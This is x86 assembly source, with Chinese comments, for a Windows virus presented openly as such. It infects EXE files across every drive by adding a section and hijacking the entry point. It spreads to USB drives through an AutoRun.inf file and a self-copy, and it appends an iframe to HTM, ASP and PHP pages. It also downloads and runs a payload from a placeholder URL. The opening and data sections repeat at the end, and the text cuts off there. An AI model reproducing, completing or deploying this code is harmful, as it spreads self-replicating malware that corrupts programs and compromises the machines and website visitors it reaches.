程序代码:.586p
.model flat, stdcall
.CODE
VirusMain:
VirusStart:
call GetDeltaPointer
GetDeltaPointer:
mov ebp,dword ptr [esp]
add esp,4
sub ebp, offset GetDeltaPointer ;重定位
;获取KERNEL32。DLL的基址
GetKernelBase:
mov eax,[esp]
and eax,0ffff0000h
check:
cmp word ptr [eax],5A4Dh; ;比较文件开头是否为MZ 因为DLL也用PE结构
jz checkpe ;如果是就进一步检查看看是不是合法的PE文件
sub eax,10000h ;当然,如果不是基址 就减去一个页
jmp check ; ;重新比较
checkpe:
mov [ebp+Kernel32Address],eax ;先保存kernel32的基址
add eax,[eax+3ch];
cmp word ptr [eax],4550h ;比较是否为PE/0/0
jnz error_Final ;不是就退出程序
jmp Begin ;
APIS:
szwsprintfA db 'wsprintfA',0
_wsprintfA dd 0
szLoadLibraryA db 'LoadLibraryA',0
_LoadLibraryA dd 0
szFreeLibrary db 'FreeLibrary',0
_FreeLibrary dd 0
szReadFile db 'ReadFile',0
_ReadFile dd 0
szWriteFile db 'WriteFile',0
_WriteFile dd 0
szSetFileAttributesA db 'SetFileAttributesA',0
_SetFileAttributesA dd 0
szGetProcAddress db 'GetProcAddress',0
_GetProcAddress dd 0
szURLDownloadToFile db 'URLDownloadToFileA',0
_URLDownloadToFile dd 0
szWinExec db 'WinExec',0
_WinExec dd 0
szGetDriveTypeA db 'GetDriveTypeA',0
_GetDriveType dd 0
szCloseHandle db 'CloseHandle',0
_CloseHandle dd 0
szCreateFileA db 'CreateFileA',0
_CreateFileA dd 0
szCreateFileMappingA db 'CreateFileMappingA',0
_CreateFileMappingA dd 0
szMapViewOfFile db 'MapViewOfFile',0
_MapViewOfFile dd 0
szSetEndOfFile db 'SetEndOfFile',0
_SetEndOfFile dd 0
szSetFilePointer db 'SetFilePointer',0
_SetFilePointer dd 0
szUnmapViewOfFile db 'UnmapViewOfFile',0
_UnmapViewOfFile dd 0
szExitProcess db 'ExitProcess',0
_ExitProcess dd 0
szGetFileSize db 'GetFileSize',0
_GetFileSize dd 0
szFindClose db 'FindClose',0
_FindClose dd 0
szFindFirstFileA db 'FindFirstFileA',0
_FindFirstFileA dd 0
szFindNextFileA db 'FindNextFileA',0
_FindNextFileA dd 0
szSetCurrentDirectoryA db 'SetCurrentDirectoryA',0
_SetCurrentDirectoryA dd 0
szGetCurrentDirectoryA db 'GetCurrentDirectoryA',0
_GetCurrentDirectoryA dd 0
szCopyFileA db 'CopyFileA',0
_CopyFileA dd 0
szGetModuleFileNameA db 'GetModuleFileNameA',0
_GetModuleFileNameA dd 0
DATAS:
UDiskSpreadData:
AutoexecName DB 'AutoExec.inf',0
AutoexecEXEname db 'DiskFixD.exe',0
szWirte db '[AutoRun]',0dh,0ah,'open=DiskFixD.exe',0dh,0ah,'shellexecute=DiskFixD.exe',0
autoexec db 16 dup(0) ;这个是用来实现U盘传播用的
UDiskBuffer db 50 dup (0)
USpreadName db 50 dup (0)
WriteAutoHandle dd 0
;****************************************************上面这个是感染U盘所用到数据
SearchFileData:
FindHandle dd 0
SearchFlag db 1 dup(0)
FoundFlag db 0
FirstFind db 0
FoundNum db 0
FoundFileNum db 0
SearchString db '*.*',0
lpFormat db '%s\%s',0
CurrentDir dd '\:d',0
cPath dd 0
cDir db 100 dup(0)
cSubDir db 260 dup(0)
WIN32_FIND_DATA STRUC
FileAttributes dd 0
CreateTime dq 0
LastAccessTime dq 0
LastWriteTime dq 0
FileSizeHigh dd 0
FileSizeLow dd 0
Reserved0 dd 0
Reserved1 dd 0
FullFileName db 260 dup(0)
AlternateFileName db 14 dup(0)
WIN32_FIND_DATA ENDS
win32_find_data WIN32_FIND_DATA <>
;****************************************************上面这个是搜索全盘所用到数据
InfectionData:
Fir_Sec_Addr dd 0
Kernel32Address DD 0
AppStart dd 0
Vlen dd (offset VirusEnd- offset VirusStart)
ImageBase dd 0
HFcreatefilemapping dd 0
HFmapviewoffile dd 0
sec_align dd 0
file_align dd 0
oldEnd dd 0
oldEip dd 0
NewIp dd 0
PE_Head dd 0
FileHandle dd 0
Now_Sec_Addr dd 0
SetJmpOepsize dd (offset SetJmpOepEnd- offset SetJmpOep)
OepData dd 0
Cur_Sec_Addr dd 0
WriteAddr dd 0
;****************************************************上面这个是感染PE文件所用到数据
WebPageSpreadData:
GuaMa db '</iframe>',0 ;替换XX里的数据为挂马的代码
WriteData dd 0
ReadData dd 0
SpreadWebPageH dd 0
;****************************************************上面这个是感染网页所用到数据
OtherData:
InfectedFlag db 0
DownedName db 'c:\windows\system32\exefix.exe',0
DownName db 'http://xxxxxxxxx/xx.exe',0;建议 最好给下扩展名
DownloaderFlag db 'C:\windows\KB962412.txt',0
DllnameUrl db 'urlmon.dll',0
DllNameUser db 'user32.dll',0
;***************************************************************************************************************其他数据
Begin:
GetAPIAddr:
lea esi,[ebp+szCopyFileA]
call GetFunctionAddress
mov [ebp+_CopyFileA],eax
lea esi,[ebp+szGetModuleFileNameA]
call GetFunctionAddress
mov [ebp+_GetModuleFileNameA],eax
lea esi,[ebp+szLoadLibraryA]
call GetFunctionAddress
mov [ebp+_LoadLibraryA],eax
lea esi,[ebp+szFreeLibrary]
call GetFunctionAddress
mov [ebp+_FreeLibrary],eax
lea esi,[ebp+szReadFile]
call GetFunctionAddress
mov [ebp+_ReadFile],eax
lea esi,[ebp+szWriteFile]
call GetFunctionAddress
mov [ebp+_WriteFile],eax
lea esi,[ebp+szSetFileAttributesA]
call GetFunctionAddress
mov [ebp+_SetFileAttributesA],eax
lea esi,[ebp+szGetProcAddress]
call GetFunctionAddress
mov [ebp+_GetProcAddress],eax
lea esi,[ebp+szGetDriveTypeA]
call GetFunctionAddress
mov [ebp+_GetDriveType],eax
lea esi,[ebp+szCloseHandle]
call GetFunctionAddress
mov [ebp+_CloseHandle],eax
lea esi,[ebp+szCreateFileA]
call GetFunctionAddress
mov [ebp+_CreateFileA],eax
lea esi,[ebp+szCreateFileMappingA];
call GetFunctionAddress
mov [ebp+_CreateFileMappingA],eax
lea esi,[ebp+szMapViewOfFile]
call GetFunctionAddress
mov [ebp+_MapViewOfFile],eax
lea esi,[ebp+szSetEndOfFile]
call GetFunctionAddress
mov [ebp+_SetEndOfFile],eax
lea esi,[ebp+szSetFilePointer]
call GetFunctionAddress
mov [ebp+_SetFilePointer],eax
lea esi,[ebp+szUnmapViewOfFile]
call GetFunctionAddress
mov [ebp+_UnmapViewOfFile],eax
lea esi,[ebp+szExitProcess]
call GetFunctionAddress
mov [ebp+_ExitProcess],eax
lea esi, [ebp+szFindFirstFileA]
call GetFunctionAddress
mov [ebp+_FindFirstFileA], eax
lea esi, [ebp+szFindNextFileA]
call GetFunctionAddress
mov [ebp+_FindNextFileA], eax
lea esi,[ebp+szFindClose]
call GetFunctionAddress
mov [ebp+_FindClose],eax
lea esi,[ebp+szGetFileSize];
call GetFunctionAddress
mov [ebp+_GetFileSize],eax
lea esi,[ebp+szSetCurrentDirectoryA]
call GetFunctionAddress
mov [ebp+_SetCurrentDirectoryA],eax
lea esi,[ebp+szGetCurrentDirectoryA]
call GetFunctionAddress
mov [ebp+_GetCurrentDirectoryA],eax
lea esi,[ebp+DllnameUrl]
push esi
call [ebp+_LoadLibraryA]
lea esi,[ebp+szURLDownloadToFile]
push esi
push eax
call [ebp+_GetProcAddress]
mov [ebp+_URLDownloadToFile],eax ;失败就退出 这个函数是用来下载的
lea esi,[ebp+szWinExec]
call GetFunctionAddress
mov [ebp+_WinExec],eax
lea esi,[ebp+DllNameUser]
push esi
call [ebp+_LoadLibraryA]
lea esi,[ebp+szwsprintfA]
push esi
push eax
call [ebp+_GetProcAddress]
mov [ebp+_wsprintfA],eax
;************************************************************需要的函数已经找到了*************************************************************************
@Next:
Spread:
lea esi,[ebp+CurrentDir];检查下是什么盘 硬盘还是U盘
push esi
call [ebp+_GetDriveType]
cmp eax,3 ;假如是硬盘
jnz NOTDISK
call SpreadExeFile
NOTDISK:
cmp eax,2 ;假如是U盘
jnz ADDDISK
call SpreadUDisk
;如果都不是就遍历找咯
ADDDISK:
cmp byte ptr [ebp+CurrentDir],'z';检查是否已经到最后一盘了
jz GoToWork2 ;如果是到最后一盘就说明结束了
inc byte ptr [ebp+CurrentDir] ;C加1就是D了 如此循环26次 因为最多也就到Z盘
jmp Spread ;遍历
SpreadExeFile:
sub esp,4
lea esi,[ebp+CurrentDir]
mov edi,esp
movsd
call SearchFiles; 开始找了
lea edi,[ebp+CurrentDir]
mov esi,esp
movsd
add esp,4
ret
SpreadUDisk:
call WriteAuto
ret
;************************************************************************MAIN程序***************************************************************
SearchFiles:
SearchFirst:
sub esp,4
mov dword ptr [esp],'refV' ;一个感染标志
SearchSec:
lea esi,[ebp+cDir] ;260byte
push esi
push 128h
call [ebp+_GetCurrentDirectoryA] ;调用函数
mov esi,[ebp+CurrentDir]
cmp byte ptr [ebp+SearchFlag],0 ;检查是否为0 为0 说明不是新的文件甲那么就直接执行下去
jnz SearchBegin ;不为0就跳过去
lea esi,[ebp+CurrentDir]
push esi
lea edi,[ebp+cSubDir]
mov ecx,3
rep movsb
pop esi
SearchBegin:
push esi ;设置指定的盘
call [ebp+_SetCurrentDirectoryA] ;获取盘
lea esi,[ebp+win32_find_data]
push esi ;
lea edx,[ebp+SearchString]
push edx
call [ebp+_FindFirstFileA] ;开始查找 找的是*.* 之后再分析
mov [ebp+FindHandle],eax ;保存句柄
inc eax
jz SearchClose ;是否为0 为0就是失败 失败就退出
dec eax
SearchAgian:
cmp byte ptr [ebp+win32_find_data.FullFileName],'.';是就继续查找
jz SearchNext ;如果不是上一级就不
cmp [ebp+win32_find_data.FileAttributes],10h;是否为文件夹
jz SaveDir ;不是文件夹
cmp [ebp+win32_find_data.FileAttributes],16h
jz SearchNext ;如果发现是系统目录就直接跳过去
cmp [ebp+win32_find_data.FileAttributes],11h
jz SearchNext ;如果发现是系统目录就直接跳过去
cmp [ebp+win32_find_data.FileAttributes],30h;是否为文件夹
jz SaveDir ;不是文件夹
;遍历操作
search:
mov byte ptr [ebp+win32_find_data.FullFileName+250],0BBH
xor ecx,ecx
search2E:
inc cl ;再次查找 是否为0
cmp byte ptr [ebp+win32_find_data.FullFileName+ecx],0BBH
jz SearchNext
cmp byte ptr [ebp+win32_find_data.FullFileName+ecx],'.'
jnz search2E
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'exe.' ;查到是EXE文件
jnz SearchEXE
pushad
call InfectFiles
popad
SearchEXE:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'EXE.' ;查到是EXE文件
jnz SearchHTM
pushad
call InfectFiles
popad
SearchHTM:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'mth.' ;查到是HTM文件
jnz SearchASP
pushad
call SpreadWebPage
popad
SearchASP:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'psa.' ;查到是ASP文件
jnz SearchPHP
pushad
call SpreadWebPage
popad
SearchPHP:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'php.' ;查到是PHP文件
jnz SearchHTML
pushad
call SpreadWebPage
popad
SearchHTML:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx+1],'lmth' ;查到是HTML文件
jnz SearchNext
pushad
call SpreadWebPage
popad
jmp SearchNext
SaveDir:
cmp byte ptr [ebp+FoundFlag],0
jz SaveDir@
sub esp,4
mov dword ptr [esp],0BBBBBBBBH
SaveDir@:
sub esp,20h
mov edi,esp
lea esi,[ebp+win32_find_data.FullFileName]
mov ecx,20h
rep movsb ;保存目录的名字
mov byte ptr [ebp+FoundFlag],0
inc byte ptr [ebp+FoundNum]
SearchNext:
lea ebx,[ebp+win32_find_data]
push ebx
push [ebp+FindHandle]
call [ebp+_FindNextFileA]
or eax,eax
jnz SearchAgian ;如果还有文件要查找
mov byte ptr [ebp+FoundFlag],1 ;设置标志说明要进入下一个层了
cmp dword ptr [esp],'refV' ;检查是否已经会到头了
jz FixedBeforeSearchHandleClose ;如果已经扫描完毕
;如果不是扫描完毕 就继续
cmp dword ptr [esp],0BBBBBBBBH
jz UpDir ;说明该层已经结束了 进入上一层
mov esi,esp
lea edi,[ebp+win32_find_data.FullFileName]
mov ecx,20h
rep movsb
add esp,20h ;把目录拿出来 接下来就是进入先的目录了
cmp byte ptr [ebp+FoundNum],0
jz UpDir1 ;说明该层已经结束了 进入上一层
cmp byte ptr [ebp+FirstFind],2
jb SetNewDir ;不为0 就是不操作了
mov byte ptr [ebp+FoundNum],0
jmp SetNewDir
UpDir1:
xor ecx,ecx
Check_:
cmp byte ptr [ebp+cSubDir+98+ecx],05ch
jz Find_
add ecx,-1
jmp Check_
Find_:
mov byte ptr [ebp+cSubDir+98+ecx],0 ;设置为0 因为都是以0为参考的
lea edi,[ebp+cSubDir+98+ecx]
mov ecx,30h
xor eax,eax
rep stosb
lea edi,[ebp+cSubDir]
mov [ebp+CurrentDir],edi
jmp SetNewDir
UpDir:
add esp,4
cmp dword ptr [esp],'refV' ;检查是否已经会到头了
jz FixedBeforeSearchHandleClose ;如果已经扫描完毕
xor ecx,ecx
Check_1:
cmp byte ptr [ebp+cSubDir+98+ecx],05ch
jz Find_1
add ecx,-1
jmp Check_1
Find_1:;
add ecx,-1
cmp byte ptr [ebp+cSubDir+98+ecx],05ch ;就修改
jnz Find_1
mov byte ptr [ebp+cSubDir+98+ecx],0
cmp dword ptr [esp],0BBBBBBBBH
jnz Find_3
add esp,4
cmp dword ptr [esp],'refV' ;检查是否已经会到头了
jz FixedBeforeSearchHandleClose ;如果已经扫描完毕
Find_2:
add ecx,-1
cmp byte ptr [ebp+cSubDir+98+ecx],05ch ;就修改
jnz Find_2
mov byte ptr [ebp+cSubDir+98+ecx],0
cmp dword ptr [esp],0BBBBBBBBH
jnz Find_3
add esp,4
cmp dword ptr [esp],'refV' ;检查是否已经会到头了
jz FixedBeforeSearchHandleClose ;如果已经扫描完毕
jmp Find_2
Find_3:
lea edi,[ebp+cSubDir+98+ecx]
mov ecx,30h
xor eax,eax
rep stosb
lea edi,[ebp+cSubDir]
mov [ebp+CurrentDir],edi
mov esi,esp
lea edi,[ebp+win32_find_data.FullFileName]
mov ecx,20h
rep movsb
add esp,20h ;把目录拿出来 接下来就是进入先的目录了
;lea esi,[ebp+win32_find_data.FullFileName]
;mov ecx,20h
;rep movsb
;mov byte ptr [ebp+SearchFlag],1
;jmp SearchSec
SetNewDir:
lea edx,[ebp+win32_find_data.FullFileName];16 22
push edx ;第一个参数
mov esi,[ebp+CurrentDir]
cmp byte ptr [ebp+SearchFlag],0
jnz IsDir
LEA esi,[ebp+CurrentDir] ;第二个参数
IsDir:
push esi
lea edx,[ebp+lpFormat]
push edx ;第三个参数
lea edx,[ebp+cSubDir]
push edx ;第四个参数
call [ebp+_wsprintfA] ;设置
add esp,10h
lea eax,[ebp+cSubDir] ;做为地址
mov [ebp+CurrentDir],eax
mov byte ptr [ebp+SearchFlag],1
lea eax,[ebp+cSubDir]
mov [ebp+CurrentDir],eax
inc byte ptr [ebp+FirstFind]
mov byte ptr [ebp+FoundNum],0
jmp SearchSec
FixedBeforeSearchHandleClose:
add esp,4
SearchHandleClose:
push dword ptr[ebp+FindHandle]
call [ebp+_FindClose]
SearchClose:
ret
;*******************************************************************以上是查找过程**********************************************************************
WriteAuto:
;U盘传播的code
;直接覆盖原来的文件
xor edi,edi
lea edi,[ebp+autoexec];申请一段空白
lea esi,[ebp+CurrentDir]
push 03h
pop ecx
rep movsb
push edi
lea edi,[ebp+USpreadName]
rep movsb
lea esi,[ebp+AutoexecEXEname]
push 0ch
pop ecx
rep movsb
pop edi
xor esi,esi
lea esi,[ebp+AutoexecName]
push 0ch
pop ecx
rep movsb
lea esi,[ebp+autoexec]
call OpenFile ;建立一个文件Autoexec.inf文件
inc eax
test eax,eax
jz WriteAutoClose
dec eax
mov [ebp+WriteAutoHandle],eax
push 0
push [ebp+WriteData]
push 55;字节数
lea edx,[ebp+szWirte]
push edx
push eax
call [ebp+_WriteFile] ;写文件 因为重写所以无须设置位置
push [ebp+WriteAutoHandle]
call [ebp+_CloseHandle]
;现在我们设置文件属性
push 6
push edx
call [ebp+_SetFileAttributesA]
push 32h
lea esi,[ebp+UDiskBuffer]
push esi
push 0
call [ebp+_GetModuleFileNameA]
test eax,eax ;是否错误
jz WriteAutoClose ;失败就退出
push 0
lea esi,[ebp+USpreadName]
push esi
lea esi,[ebp+UDiskBuffer]
push esi
call [ebp+_CopyFileA]
WriteAutoClose:
ret
;**************************************************************************以上过程是U盘传播************************************************************
SpreadWebPage:
;网页传播的code
;先检查下文件的末尾是否有</frame>字样 有说明文件已经被感染了 就退出 没有就写入
lea esi,[ebp+win32_find_data.FullFileName];
push 80H
push esi
call [ebp+_SetFileAttributesA];先设置属性
call OpenFileE
mov [ebp+SpreadWebPageH],eax
inc eax
test eax,eax
jz SpreadError
;设置位置
mov ecx,dword ptr [ebp+win32_find_data.FileSizeLow]
sub ecx,9;因为那个标志占了 9个字符
push 1
xor eax,eax
push eax
push ecx
push [ebp+SpreadWebPageH]
call [ebp+_SetFilePointer]
;接下来设置下标志
push 0
lea esi,[ebp+ReadData]
push esi
push 9
lea esi,[ebp+GuaMa]
push esi
push [ebp+SpreadWebPageH]
call [ebp+_ReadFile] ;查找标志
test eax,eax
jz SpreadClose ;如果找到就退出
;这里开始写挂马的代码
push 2
xor eax,eax
push eax
push eax
push [ebp+SpreadWebPageH]
call [ebp+_SetFilePointer]
push 0
lea esi,[ebp+WriteData]
push esi
;***************************************************有个假设
push 9 ;这里的X是挂马的数据大小
;******************************************************************
lea esi,[ebp+GuaMa]
push esi
push [ebp+SpreadWebPageH]
call [ebp+_WriteFile]
;写入数据完毕
SpreadClose:
push [ebp+SpreadWebPageH]
call [ebp+_CloseHandle]
SpreadError:
ret
;*************************************************************************以上的是网页传播**************************************************************
InfectFiles:
lea esi,[ebp+win32_find_data.FullFileName];
push 80H
push esi
call [ebp+_SetFileAttributesA]
call OpenFile
mov [ebp+FileHandle],eax
inc eax
test eax,eax
jz error_Final
mov ecx,dword ptr [ebp+win32_find_data.FileSizeLow]
add ecx,01000h
push ecx
call CreateMap
test eax,eax
jz error_CreateMap
mov [ebp+HFcreatefilemapping],eax;
pop ecx
call MapFile
test eax,eax
jz error_MapFile
mov [ebp+HFmapviewoffile],eax
Injection:
xchg esi,eax
cmp word ptr [esi],5A4Dh;
jnz error_MapFile
add esi,[esi+3ch];
cmp word ptr [esi],4550h
jnz error_MapFile
cmp dword ptr [esi+08h],'vfer'
jz @Close ;has been infect
mov [ebp+PE_Head],esi
push 0h
pop dword ptr [esi+0d0h]
push 0h
pop dword ptr[esi+0d4h]
mov ebx, dword ptr[esi+38h]
mov [ebp+sec_align],ebx
mov edi,dword ptr [esi+3ch]
mov [ebp+file_align],edi
mov ebx,dword ptr [esi+28h]
add ebx,[esi+34h]
mov [ebp+oldEip],ebx
movzx ebx,word ptr [esi+14h];
lea eax,[esi+ebx+18h];
movzx ecx,word ptr [esi+06h];
cmp ecx,8
ja @Close
xchg esi,eax
mov dword ptr [ebp+Fir_Sec_Addr],esi
;****************************************************************************************************************************
;First i check if program had been packed
;*******************************************************************************************************************************
RandNum:
RDTSC;
and eax,00000002h;
xchg eax,ecx
imul ecx,ecx,28h;
add esi,ecx;;
mov dword ptr [ebp+Cur_Sec_Addr],esi
mov ebx,dword ptr [esi+08h];
mov edx,dword ptr [esi+0ch];
add edx,ebx
mov dword ptr [ebp+OepData],edx;
mov edx,dword ptr [esi+10h];
sub edx,dword ptr [esi+08h];
js error_MapFile ;
mov edi,dword ptr [esi+14h];
add edi,dword ptr [esi+08h]
add edi,dword ptr [ebp+HFmapviewoffile];
sub edx,5
RandData:
push edx
RDTSC
pop edx
AND eax,edx
test eax,eax
jz RandData
mov edx,dword ptr [ebp+OepData]
add edx,eax
mov dword ptr[ebp+OepData],edx
add edi,eax
mov dword ptr [ebp+WriteAddr],edi
cmp dword ptr [edi],00000000h
jnz error_MapFile
;***********************************************************
; ok if the program hadnt packed i append a section
;**************************************************************
mov esi,dword ptr [PE_Head]
movzx ecx,word ptr[esi+06h] ;
inc word ptr [esi+06h]
imul ecx,ecx,28h ;
mov esi,dword ptr [ebp+Fir_Sec_Addr]
add esi,ecx
mov dword ptr [ebp+Now_Sec_Addr],esi
mov dword ptr[esi],' '
mov ebx,dword ptr[ebp+Vlen]
mov dword ptr [esi+08h],ebx
mov dword ptr [esi+24h],0e0000020h
mov eax,dword ptr [esi-28h+08h] ;
mov ebx,dword ptr[ebp+sec_align]
cmp eax,ebx
xor ecx,ecx
jb @1
@@@@1:
push eax
sub eax,ebx
js @@@@2
inc ecx
pop eax
sub eax,dword ptr [ebp+sec_align]
jmp @@@@1
@@@@2:
pop eax
inc ecx
mov eax,dword ptr [ebp+sec_align]
mul ecx
xchg eax,ebx
@1:
add ebx,dword ptr [esi-28h+0ch]
mov dword ptr [esi+0ch],ebx
@@1:
mov dword ptr [ebp+NewIp],ebx
mov eax,dword ptr [ebp+Vlen]
mov ebx,dword ptr [ebp+file_align];
xor ecx,ecx
cmp eax,ebx
jb @2
@@@@3:
push eax
sub eax,ebx
js @@@@4
inc ecx
pop eax
sub eax,dword ptr [ebp+file_align]
jmp @@@@3
@@@@4:
pop eax
inc ecx
mov eax,dword ptr [ebp+file_align]
mul ecx
xchg eax,ebx
@2:
mov dword ptr [esi+10h],ebx
@@2:
mov eax,dword ptr [esi-28h+14h]
mov ebx,dword ptr [esi-28h+10h]
add eax,ebx
mov dword ptr [esi+14h],eax
mov [ebp+oldEnd],eax ;
;******************************************************************************************************************************************************
;Here i set "JMP xxxxxxxx" in the space where alway no data in it
; however, you also can set other data or code in it if the area have enough space
;******************************************************************************************************************************************************
RandSetData:
mov edi,dword ptr [ebp+WriteAddr] ; haha a joke
mov esi,offset SetJmpOep
mov ecx,[ebp+SetJmpOepsize]
cld
rep movsb
mov edx,dword ptr [ebp+OepData]
add edx,5
mov esi,dword ptr [ebp+Now_Sec_Addr]
mov ebx,dword ptr [esi+0ch]
sub ebx,edx
mov dword ptr [edi],ebx
mov eax,dword ptr [ebp+PE_Head]
mov ebx,dword ptr [ebp+OepData]
mov dword ptr [eax+28h],ebx
mov ebx,[eax+50h]
add ebx,[ebp+Vlen]
mov ecx,[ebp+sec_align]
xor edx,edx
xchg eax,ebx
cdq
div ecx
test edx,edx
je @@@4
inc eax
@@@4:
mul ecx
xchg eax,ebx
mov [eax+50h],ebx
mov dword ptr [eax+8h],'vfer'
cld
mov ecx,[ebp+Vlen]
mov edi,[ebp+oldEnd]
add edi,[ebp+HFmapviewoffile]
lea esi,[ebp+VirusStart]
rep movsb
xor eax,eax
sub edi,[ebp+HFmapviewoffile]
push 0h
push 0h
push edi
push [ebp+FileHandle]
call [ebp+_SetFilePointer]
push [ebp+FileHandle]
call [ebp+_SetEndOfFile]
@Close:
call UnMapFile
call UnCreateMap
call UnOpenFile
ret
;*****************************************************************以上的这个是EXE感染过程****************************************************************
GetFunctionAddress PROC
mov eax, [ebp+Kernel32Address] ;EAX = Kernel32 Address
mov ebx, [eax+3Ch]
add ebx, eax
add ebx, 120
mov ebx, [ebx]
add ebx, eax ;EBX = Export Address
xor edx, edx
mov ecx, [ebx+32]
add ecx, eax
push esi
push edx
CompareNext:
pop edx
pop esi
inc edx
mov edi, [ecx]
add edi, eax
add ecx, 4
push esi
push edx
CompareName:
mov dl, [edi]
mov dh, [esi]
cmp dl, dh
jne CompareNext
inc edi
inc esi
cmp byte ptr [esi], 0
je GetAddress
jmp CompareName
GetAddress:
pop edx
pop esi
dec edx
shl edx, 1
mov ecx, [ebx+36]
add ecx, eax
add ecx, edx
xor edx, edx
mov dx, [ecx]
shl edx, 2
mov ecx, [ebx+28]
add ecx, eax
add ecx, edx
add eax, [ecx]
ret
GetFunctionAddress ENDP
MapFile proc ; ECX为文件大小
xor eax,eax
push ecx
push eax
push eax
push 00000002h
push dword ptr [ebp+HFcreatefilemapping]
call [ebp+_MapViewOfFile]
ret
MapFile endp
CreateMap proc ;Ecx为病毒大小
xor eax,eax
push eax
push ecx
push eax
push 00000004h
push eax
push dword ptr [ebp+FileHandle]
call [ebp+_CreateFileMappingA]
ret
CreateMap endp
OpenFile proc
xor eax,eax ;ESI指向病毒的句柄
push eax
push eax
push 00000003h
push eax
inc eax
push eax
push 80000000h or 40000000h
push esi
call [ebp+_CreateFileA] ;打开指定文件
ret
OpenFile endp
OpenFileE proc
xor eax,eax ;ESI指向病毒的句柄
push eax
push 00000080h
push 00000004h
push eax
push 00000002h
push 80000000h or 40000000h
push esi
call [ebp+_CreateFileA] ;打开指定文件
ret
OpenFileE endp
SetJmpOep:
db 0E9h
SetJmpOepEnd:
UnMapFile proc
push [ebp+HFmapviewoffile]
call [ebp+_UnmapViewOfFile]
ret
UnMapFile endp
UnCreateMap proc
push [ebp+HFcreatefilemapping]
call [ebp+_CloseHandle];
ret
UnCreateMap endp
UnOpenFile proc
push [ebp+FileHandle]
call [ebp+_CloseHandle]
ret
UnOpenFile endp
GoToWork:
;********************************************************************************************
;这里是要执行代码
;先检查下是否为已经下载
mov byte ptr [ebp+InfectedFlag],1
GoToWork2:
push 80h
lea esi,[ebp+DownloaderFlag]
push esi
call [ebp+_SetFileAttributesA]
test eax,eax;如果失败了
jnz CheckBeforBack
;如果要下载多个程序
xor eax,eax
push eax
push eax
lea esi,[ebp+DownedName]
push esi
lea esi,[ebp+DownName]
push esi
push eax
call [ebp+_URLDownloadToFile]
;下载完毕 接着 设置标志 建立一个文件
lea esi,[ebp+DownloaderFlag]
call OpenFileE ;打开文件
push eax
call [ebp+_CloseHandle]
;设置标志完成
push 1
lea esi,[ebp+DownedName]
push esi
call [ebp+_WinExec]
CheckBeforBack:
cmp byte ptr [ebp+InfectedFlag],1
jnz @Exit
;要执行的代码
GoBack:
mov eax,dword ptr[ebp+oldEip]
jmp eax
error_MapFile:
call UnMapFile
error_CreateMap:
call UnCreateMap
error_Final:
call UnOpenFile
ret
@Exit:
push 0h
call [ebp+_ExitProcess];
VirusEnd:
end VirusMain
.model flat, stdcall
.CODE
VirusMain:
VirusStart:
call GetDeltaPointer
GetDeltaPointer:
mov ebp,dword ptr [esp]
add esp,4
sub ebp, offset GetDeltaPointer ;重定位
;获取KERNEL32。DLL的基址
GetKernelBase:
mov eax,[esp]
and eax,0ffff0000h
check:
cmp word ptr [eax],5A4Dh; ;比较文件开头是否为MZ 因为DLL也用PE结构
jz checkpe ;如果是就进一步检查看看是不是合法的PE文件
sub eax,10000h ;当然,如果不是基址 就减去一个页
jmp check ; ;重新比较
checkpe:
mov [ebp+Kernel32Address],eax ;先保存kernel32的基址
add eax,[eax+3ch];
cmp word ptr [eax],4550h ;比较是否为PE/0/0
jnz error_Final ;不是就退出程序
jmp Begin ;
APIS:
szwsprintfA db 'wsprintfA',0
_wsprintfA dd 0
szLoadLibraryA db 'LoadLibraryA',0
_LoadLibraryA dd 0
szFreeLibrary db 'FreeLibrary',0
_FreeLibrary dd 0
szReadFile db 'ReadFile',0
_ReadFile dd 0
szWriteFile db 'WriteFile',0
_WriteFile dd 0
szSetFileAttributesA db 'SetFileAttributesA',0
_SetFileAttributesA dd 0
szGetProcAddress db 'GetProcAddress',0
_GetProcAddress dd 0
szURLDownloadToFile db 'URLDownloadToFileA',0
_URLDownloadToFile dd 0
szWinExec db 'WinExec',0
_WinExec dd 0
szGetDriveTypeA db 'GetDriveTypeA',0
_GetDriveType dd 0
szCloseHandle db 'CloseHandle',0
_CloseHandle dd 0
szCreateFileA db 'CreateFileA',0
_CreateFileA dd 0
szCreateFileMappingA db 'CreateFileMappingA',0
_CreateFileMappingA dd 0
szMapViewOfFile db 'MapViewOfFile',0
_MapViewOfFile dd 0
szSetEndOfFile db 'SetEndOfFile',0
_SetEndOfFile dd 0
szSetFilePointer db 'SetFilePointer',0
_SetFilePointer dd 0
szUnmapViewOfFile db 'UnmapViewOfFile',0
_UnmapViewOfFile dd 0
szExitProcess db 'ExitProcess',0
_ExitProcess dd 0
szGetFileSize db 'GetFileSize',0
_GetFileSize dd 0
szFindClose db 'FindClose',0
_FindClose dd 0
szFindFirstFileA db 'FindFirstFileA',0
_FindFirstFileA dd 0
szFindNextFileA db 'FindNextFileA',0
_FindNextFileA dd 0
szSetCurrentDirectoryA db 'SetCurrentDirectoryA',0
_SetCurrentDirectoryA dd 0
szGetCurrentDirectoryA db 'GetCurrentDirectoryA',0
_GetCurrentDirectoryA dd 0
szCopyFileA db 'CopyFileA',0
_CopyFileA dd 0
szGetModuleFileNameA db 'GetModuleFileNameA',0
_GetModuleFileNameA dd 0
DATAS:
UDiskSpreadData:
AutoexecName DB 'AutoExec.inf',0
AutoexecEXEname db 'DiskFixD.exe',0
szWirte db '[AutoRun]',0dh,0ah,'open=DiskFixD.exe',0dh,0ah,'shellexecute=DiskFixD.exe',0
autoexec db 16 dup(0) ;这个是用来实现U盘传播用的
UDiskBuffer db 50 dup (0)
USpreadName db 50 dup (0)
WriteAutoHandle dd 0
;****************************************************上面这个是感染U盘所用到数据
SearchFileData:
FindHandle dd 0
SearchFlag db 1 dup(0)
FoundFlag db 0
FirstFind db 0
FoundNum db 0
FoundFileNum db 0
SearchString db '*.*',0
lpFormat db '%s\%s',0
CurrentDir dd '\:d',0
cPath dd 0
cDir db 100 dup(0)
cSubDir db 260 dup(0)
WIN32_FIND_DATA STRUC
FileAttributes dd 0
CreateTime dq 0
LastAccessTime dq 0
LastWriteTime dq 0
FileSizeHigh dd 0
FileSizeLow dd 0
Reserved0 dd 0
Reserved1 dd 0
FullFileName db 260 dup(0)
AlternateFileName db 14 dup(0)
WIN32_FIND_DATA ENDS
win32_find_data WIN32_FIND_DATA <>
